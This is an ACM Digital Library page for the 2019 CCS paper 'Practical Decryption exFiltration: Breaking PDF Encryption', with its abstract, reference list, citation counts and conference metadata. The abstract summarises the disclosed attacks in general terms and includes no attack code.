research-article

Practical Decryption exFiltration: Breaking PDF Encryption

Authors:

Vladislav Mladenov,

Christian Mainka,

Sebastian Schinzel,

Jörg SchwenkAuthors Info & Claims

CCS '19: Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security

Pages 15 - 29

https://doi.org/10.1145/3319535.3354214

Published: 06 November 2019 Publication History

Abstract

The Portable Document Format, better known as PDF, is one of the most widely used document formats worldwide, and in order to ensure information confidentiality, this file format supports document encryption. In this paper, we analyze PDF encryption and show two novel techniques for breaking the confidentiality of encrypted documents. First, we abuse the PDF feature of partially encrypted documents to wrap the encrypted part of the document within attacker-controlled content and therefore, exfiltrate the plaintext once the document is opened by a legitimate user. Second, we abuse a flaw in the PDF encryption specification to arbitrarily manipulate encrypted content. The only requirement is that a single block of known plaintext is needed, and we show that this is fulfilled by design. Our attacks allow the recovery of the entire plaintext of encrypted documents by using exfiltration channels which are based on standard compliant PDF properties. We evaluated our attacks on 27 widely used PDF viewers and found all of them to be vulnerable. We responsibly disclosed the vulnerabilities and supported the vendors in fixing the issues.

Supplementary Material

WEBM File (p15-ising.webm)

Download
96.94 MB

References

[1]

Adobe Systems. 2005. Acrobat JavaScript Scripting Guide.

[2]

Adobe Systems. 2008. Adobe Supplement to the ISO 32000, BaseVersion: 1.7, ExtensionLevel: 3.

[3]

Adobe Systems. 2012. XMP Specification Part 1.

[4]

John August. 2014. Try to open this PDF, cont'd. https://johnaugust.com/2014/try-to-open-this-pdf-contd

[5]

CANON. 2019. PDF Encryption. https://www.canon.com.hk/en/business/solution/PDF_Security.jspx

[6]

Curtis Carmony, Xunchao Hu, Heng Yin, Abhishek Vasisht Bhaskar, and Mu Zhang. 2016. Extract Me If You Can: Abusing PDF Parsers in Malware Detectors. In NDSS. The Internet Society.

[7]

Ping Chen, Nick Nikiforakis, Christophe Huygens, and Lieven Desmet. 2015. A Dangerous Mix: Large-scale analysis of mixed-content websites. In Information Security. Springer, 354--363.

[8]

CipherMail. 2019. Email Encryption Gateway. https://www.ciphermail.com/gateway.html

[9]

B. Danczul, J. Fuß, S. Gradinger, B. Greslehner, W. Kastl, and F. Wex. 2013. Cuteforce Analyzer: A Distributed Bruteforce Attack on PDF Encryption with GPUs and FPGAs. In 2013 International Conference on Availability, Reliability and Security. 720--725. https://doi.org/10.1109/ARES.2013.94

[10]

Dennis Detering, Juraj Somorovsky, Christian Mainka, Vladislav Mladenov, and Jörg Schwenk. 2017. On the (in-) security of JavaScript Object Signing and Encryption. In Proceedings of the 1st Reversing and Offensive-oriented Trends Symposium. ACM, 3.

Digital Library

[11]

P. Deutsch. 1996. DEFLATE Compressed Data Format Specification version 1.3. http://tools.ietf.org/rfc/rfc1951.txt RFC1951.

[12]

P. Deutsch and J-L. Gailly. 1996. ZLIB Compressed Data Format Specification version 3.3. http://tools.ietf.org/rfc/rfc1950.txt RFC1950.

[13]

Elcomsoft. 2007. Unlocking PDF. https://www.elcomsoft.com/WP/guaranteed_password_recovery_for_adobe_acrobat_en.pdf

[14]

Elcomsoft. 2008. ElcomSoft Claims Adobe Acrobat 9 Is a Hundred Times Less Secure. https://www.elcomsoft.com/PR/apdfpr_081126_en.pdf

[15]

Gertjan Franken, Tom Van Goethem, and Wouter Joosen. 2018. Who Left Open the Cookie Jar? A Comprehensive Evaluation of Third-Party Cookie Policies. In 27th USENIX Security Symposium (USENIX Security 18). USENIX Association, Baltimore, MD, 151--168. https://www.usenix.org/conference/usenixsecurity18/presentation/franken

[16]

Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan. 2016. Dancing on the lip of the volcano: Chosen ciphertext attacks on apple imessage. In 25th $$USENIX$$ Security Symposium ($$USENIX$$ Security 16). 655--672.

[17]

Martin Grothe, Christian Mainka, Paul Rösler, and Jörg Schwenk. 2016a. How to Break Microsoft Rights Management Services. In 10th USENIX Workshop on Offensive Technologies (WOOT 16). USENIX Association, Austin, TX. https://www.usenix.org/conference/woot16/workshop-program/presentation/grothe

[18]

Martin Grothe, Christian Mainka, Paul Rösler, and Jörg Schwenk. 2016b. How to break microsoft rights management services. In 10th $$USENIX$$ Workshop on Offensive Technologies ($$WOOT$$ 16).

[19]

IBM. [n. d.]. BM Print Transforms from AFP forInfoprint Server for z/OS, V1.2.2. https://www-01.ibm.com/servers/resourcelink/svc00100.nsf/pages/zOSV2R3G3252634/$file/aokfa00_v2r3.pdf

[20]

Alexander1 Inführ. 2014. Multiple PDF Vulnerabilities -- Text and Pictures on Steroids. https://insert-script.blogspot.de/2014/12/multiple-pdf-vulnerabilites-text-and.html

[21]

Alexander2 Inführ. 2018. Adobe Reader PDF - Client Side Request Injection. https://insert-script.blogspot.de/2018/05/adobe-reader-pdf-client-side-request.html

[22]

Innoport. [n. d.]. HIPAA Compliant Fax by Innoport. https://www.innoport.com/hipaa-compliant-fax/

[23]

Tibor Jager, Kenneth G Paterson, and Juraj Somorovsky. 2013. One Bad Apple: Backwards Compatibility Attacks on State-of-the-Art Cryptography. In NDSS.

[24]

Tibor Jager, Sebastian Schinzel, and Juraj Somorovsky. 2012. Bleichenbacher's attack strikes again: breaking PKCS# 1 v1. 5 in XML Encryption. In European Symposium on Research in Computer Security. Springer, 752--769.

[25]

Tibor Jager and Juraj Somorovsky. 2011. How To Break XML Encryption. In The 18th ACM Conference on Computer and Communications Security (CCS).

[26]

M. Jones and J. Hildebrand. 2015. JSON Web Encryption (JWE). http://tools.ietf.org/rfc/rfc7516.txt RFC7516.

[27]

Tommi Komulainen. [n. d.]. The Adobe eBook Case. Publications in Telecommunications Software and Multimedia TML-C7 ISSN, Vol. 1455 ( [n. d.]), 9749.

[28]

Encryptomatic LLC. 2019. Improving the Email Experience. https://www.encryptomatic.com/pdfpostman/

[29]

Locklizard. 2019. What is PDF encryption and how to encrypt PDF documents & files. https://www.locklizard.com/pdf-encryption/

[30]

Vladislav Mladenov, Christian Mainka, Karsten Meyer zu Selhausen, Martin Grothe, and Jörg Schwenk. [n. d.]. 1 Trillion Dollar Refund -- How To Spoof PDF Signatures. ([n. d.]).

[31]

Vladislav Mladenov, Christian Mainka, Karsten Meyer zu Selhausen, Martin Grothe, and Jörg Schwenk. 2019. 1 Trillion Dollar Refund--How To Spoof PDF Signatures. (2019).

[32]

Jens Müller, Vladislav Mladenov, Dennis Felsch, and Jörg Schwenk. 2018. PostScript Undead: Pwning the Web with a 35 Years Old Language. In International Symposium on Research in Attacks, Intrusions, and Defenses. Springer, 603--622.

[33]

Jens Müller, Marcus Brinkmann, Damian Poddebniak, Sebastian Schinzel, and Jörg Schwenk. 2019. Re: What's Up Johnny? -- Covert Content Attacks on Email End-to-End Encryption. https://arxiv.org/ftp/arxiv/papers/1904/1904.07550.pdf.

[34]

NoSpamProxy. 2019. Simple Email Encryption. https://www.nospamproxy.de/en/product/nospamproxy-encryption/

[35]

U.S. Department of Justice. 2016. Standard Form 750 -- Claims Collection Litigation Report Instructions 2/16. https://www.justice.gov/jmd/file/789246/download

[36]

Thom Parker. 2006. How to do (not so simple) form calculations. https://acrobatusers.com/tutorials/print/how-to-do-not-so-simple-form-calculations

[37]

PDFlib. [n. d.]. PDF 2.0 (ISO 32000--2): Existing Acrobat Features. https://www.pdflib.com/pdf-knowledge-base/pdf-20/existing-acrobat-features/

[38]

Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky, and Jörg Schwenk. 2018. Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels. In 27th USENIX Security Symposium (USENIX Security 18). USENIX Association, Baltimore, MD, 549--566. https://www.usenix.org/conference/usenixsecurity18/presentation/poddebniak

[39]

Dan-Sabin Popescu. 2012. Hiding Malicious Content in PDF Documents. CoRR, Vol. abs/1201.0397 (2012). arxiv: 1201.0397 http://arxiv.org/abs/1201.0397

[40]

F. Raynal, G. Delugré, and D. Aumaitre. 2010. Malicious Origami in PDF. Journal in Computer Virology, Vol. 6, 4 (2010), 289--315. http://esec-lab.sogeti.com/static/publications/08-pacsec-maliciouspdf.pdf

Digital Library

[41]

Check Point Research. 2018. NTLM Credentials Theft via PDF Files. https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/

[42]

Ricoh. [n. d.]. Multifunctional Products and Printers for Healthcare. http://brochure.copiercatalog.com/ricoh/mp501spftl.pdf

[43]

Rimage. [n. d.]. Rimage encryption options keep your data secure. https://www.rimage.com/emea/learn/tips-tools/encryption-keeps-data-secure/

[44]

Billy Rios, Federico Lanusse, and Mauro Gentile. 2013. Adobe Reader Same-Origin Policy Bypass. http://www.sneaked.net/adobe-reader-same-origin-policy-bypass

[45]

Samsung MFP Security. [n. d.]. White Paper: Samsung Security Framework. http://www8.hp.com/h20195/v2/GetPDF.aspx/c05814811.pdf

[46]

Dmitry Sklyarov and A Malyshev. 2001. eBooks security-theory and practice. DEFCon. Retrieved March, Vol. 1 (2001), 2004.

[47]

STOIK Soft. 2019. Mobile Doc Scanner (MDScan)

[48]

OCR. https://play.google.com/store/apps/details?id=com.stoik.mdscan

[49]

Didier Stevens. 2017. Cracking Encrypted PDFs. https://blog.didierstevens.com/2017/12/26/cracking-encrypted-pdfs-part-1/

[50]

Marc Stevens, Elie Bursztein, Pierre Karpman, Ange Albertini, and Yarik Markov. 2017. The first collision for full SHA-1. In Annual International Cryptology Conference. Springer, 570--596.

[51]

Adobe Systems. 2006. PDF Reference, version 1.7 sixth edition ed.).

[52]

Adobe Systems. 2017. Displaying 3D models in PDFs. https://helpx.adobe.com/acrobat/using/displaying-3d-models-pdfs.html

[53]

Adobe Systems. 2019 a. Applying actions and scripts to PDFs. https://helpx.adobe.com/acrobat/using/applying-actions-scripts-pdfs.html

[54]

Adobe Systems. 2019 b. How to fill in PDF forms. https://helpx.adobe.com/en/acrobat/using/filling-pdf-forms.html

[55]

Adobe Systems. 2019 c. Starting a PDF review. https://helpx.adobe.com/acrobat/using/starting-pdf-review.html

[56]

H. Valentin. 2012. Malicious URI resolving in PDF Documents. Blackhat Abu Dhabi (2012). https://media.blackhat.com/ad-12/Hamon/bh-ad-12-malicious%20URI-Hamon-Slides.pdf

[57]

VITRIUM. 2019. Image Protection. https://www.vitrium.com/image-protection-drm/

[58]

Wibu-Systems. 2019. PDF Protection. https://www.wibu.com/solutions/document-protection/pdf.html

Cited By

Kumar AHarris BTan G(2023)DISV: Domain Independent Semantic Validation of Data Files2023 IEEE Security and Privacy Workshops (SPW)10.1109/SPW59333.2023.00020(163-174)Online publication date: May-2023
https://doi.org/10.1109/SPW59333.2023.00020
Tullsen MHarris WWyatt P(2022)Research Report: Strengthening Weak Links in the PDF Trust Chain2022 IEEE Security and Privacy Workshops (SPW)10.1109/SPW54247.2022.9833889(152-167)Online publication date: May-2022
https://doi.org/10.1109/SPW54247.2022.9833889
Pan SSaha DMoona R(2022)Radian: Leveraging PKI for Long-Term Validation Enabled Digital Academic Testimonials - A Case-Study2022 IEEE International Conference on Public Key Infrastructure and its Applications (PKIA)10.1109/PKIA56009.2022.9952257(1-8)Online publication date: 9-Sep-2022
https://doi.org/10.1109/PKIA56009.2022.9952257
Show More Cited By

Index Terms

Practical Decryption exFiltration: Breaking PDF Encryption
1. Security and privacy

Recommendations

Multi-Identity Single-Key Decryption without Random Oracles
Information Security and Cryptology

Multi-Identity Single-Key Decryption (MISKD) is an Identity-Based Encryption (IBE) system where a private decryption key can map multiple public keys (identities). More exactly, in MISKD, a single private key can be used to decrypt multiple ciphertexts ...
Trading decryption for speeding encryption in Rebalanced-RSA

In 1982, Quisquater and Couvreur proposed an RSA variant, called RSA-CRT, based on the Chinese Remainder Theorem to speed up RSA decryption. In 1990, Wiener suggested another RSA variant, called Rebalanced-RSA, which further speeds up RSA decryption by ...
Cryptographic algorithm development and application for encryption and decryption
ICIMMI '23: Proceedings of the 5th International Conference on Information Management & Machine Intelligence

Abstract—Cryptographic algorithms are used to maintain the data confidentiality and integrity. In the era of ubiquitous digital communication and information exchange, the security of sensitive data has become a paramount concern. Cryptographic ...

Comments

Information & Contributors

Information

Published In

cover image ACM Conferences

CCS '19: Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security

November 2019

2755 pages

ISBN:9781450367479

DOI:10.1145/3319535

General Chairs:
Lorenzo Cavallaro
King's College London, UK
,
Johannes Kinder
Bundeswehr University Munich, Germany
,
Program Chairs:
XiaoFeng Wang
Indiana University, USA
,
Jonathan Katz
George Mason University, USA

Copyright © 2019 ACM.

Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than the author(s) must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from [email protected].

Sponsors

SIGSAC: ACM Special Interest Group on Security, Audit, and Control

Publisher

Association for Computing Machinery

New York, NY, United States

Publication History

Published: 06 November 2019

Permissions

Request permissions for this article.

Request Permissions

Check for updates

Author Tags

Qualifiers

Research-article

Funding Sources

European Commission
European Regional Development Fund North Rhine-Westphalia (EFRE.NRW)
German Research Foundation (DFG)
State of North Rhine-Westfalia

Conference

CCS '19

Sponsor:

SIGSAC

CCS '19: 2019 ACM SIGSAC Conference on Computer and Communications Security

November 11 - 15, 2019

London, United Kingdom

Acceptance Rates

CCS '19 Paper Acceptance Rate 149 of 934 submissions, 16%;

Overall Acceptance Rate 1,261 of 6,999 submissions, 18%

Upcoming Conference

CCS '25

Sponsor:
sigsac

ACM SIGSAC Conference on Computer and Communications Security

October 13 - 17, 2025

Taipei , Taiwan

Contributors

Other Metrics

View Article Metrics

Bibliometrics & Citations

Bibliometrics

Article Metrics

8
Total Citations
View Citations
1,313
Total Downloads

Downloads (Last 12 months)50
Downloads (Last 6 weeks)3

Reflects downloads up to 28 Feb 2025

Other Metrics

View Author Metrics

Citations

Cited By

Kumar AHarris BTan G(2023)DISV: Domain Independent Semantic Validation of Data Files2023 IEEE Security and Privacy Workshops (SPW)10.1109/SPW59333.2023.00020(163-174)Online publication date: May-2023
https://doi.org/10.1109/SPW59333.2023.00020
Tullsen MHarris WWyatt P(2022)Research Report: Strengthening Weak Links in the PDF Trust Chain2022 IEEE Security and Privacy Workshops (SPW)10.1109/SPW54247.2022.9833889(152-167)Online publication date: May-2022
https://doi.org/10.1109/SPW54247.2022.9833889
Pan SSaha DMoona R(2022)Radian: Leveraging PKI for Long-Term Validation Enabled Digital Academic Testimonials - A Case-Study2022 IEEE International Conference on Public Key Infrastructure and its Applications (PKIA)10.1109/PKIA56009.2022.9952257(1-8)Online publication date: 9-Sep-2022
https://doi.org/10.1109/PKIA56009.2022.9952257
Li LEakman GGarcia EAtman S(2021)Accessible Formal Methods for Verified Parser Development2021 IEEE Security and Privacy Workshops (SPW)10.1109/SPW53761.2021.00028(142-151)Online publication date: May-2021
https://doi.org/10.1109/SPW53761.2021.00028
Rohlmann SMladenov VMainka CSchwenk J(2021)Breaking the Specification: PDF Certification2021 IEEE Symposium on Security and Privacy (SP)10.1109/SP40001.2021.00110(1485-1501)Online publication date: May-2021
https://doi.org/10.1109/SP40001.2021.00110
Jiang JSong NYu MChow KLi GLiu CHuang W(2021)DETECTING MALICIOUS PDF DOCUMENTS USING SEMI-SUPERVISED MACHINE LEARNINGAdvances in Digital Forensics XVII10.1007/978-3-030-88381-2_7(135-155)Online publication date: 15-Oct-2021
https://doi.org/10.1007/978-3-030-88381-2_7
Schwenk JBrinkmann MPoddebniak DMüller JSomorovsky JSchinzel SLigatti JOu XKatz JVigna G(2020)Mitigation of Attacks on Email End-to-End EncryptionProceedings of the 2020 ACM SIGSAC Conference on Computer and Communications Security10.1145/3372297.3417878(1647-1664)Online publication date: 30-Oct-2020
https://dl.acm.org/doi/10.1145/3372297.3417878
Fujita RIsobe TMinematsu K(2020)ACE in Chains: How Risky Is CBC Encryption of Binary Executable Files?Applied Cryptography and Network Security10.1007/978-3-030-57808-4_10(187-207)Online publication date: 27-Aug-2020
https://doi.org/10.1007/978-3-030-57808-4_10

View Options

Login options

Check if you have access through your login credentials or your institution to get full access on this article.

Full Access

Get this Publication

View options

PDF

View or Download as a PDF file.

eReader

View online with eReader.

Figures

Tables

Media

View Table of Conten